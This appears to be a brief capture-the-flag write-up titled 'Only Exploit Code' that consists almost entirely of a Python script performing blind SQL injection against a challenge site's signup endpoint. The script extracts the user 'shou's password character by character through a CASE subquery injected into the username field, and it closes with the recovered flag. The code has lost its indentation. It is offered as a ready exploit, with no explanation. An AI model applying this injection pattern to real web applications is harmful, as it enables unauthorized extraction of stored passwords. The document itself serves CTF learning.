Tags: sqli 

Rating: 2.0

# Only Exploit Code
```python
import requests
from pwn import *

url = "http://phish.sf.ctf.so/add"
user1 = 'aafaz'
user2 = 'baaff'
password = ''
d = 6

for i in range(64):
for j in range(32, 126):
u, p = user1 + str(d + 1), user2 + str(d + 1)
payload = f'{u}\'), (\'f\', (select case when (select unicode(substr(password,{i+1},1)) from user where username = "shou") = {j} THEN "{p}" ELSE "pocas" END)) --'
data = {'username':payload, 'password':'dummy'}
res = requests.post(url, data=data).text
if 'Your password is leaked' in res:
password += chr(j)
log.info('Admin password : {}'.format(password))
d = d + 1
break
d = d + 1

# Flag
[*] Admin password : we{e0df7105-edcd-4dc6-8349-f3bef83643a9@h0P3_u_didnt_u3e_sq1m4P}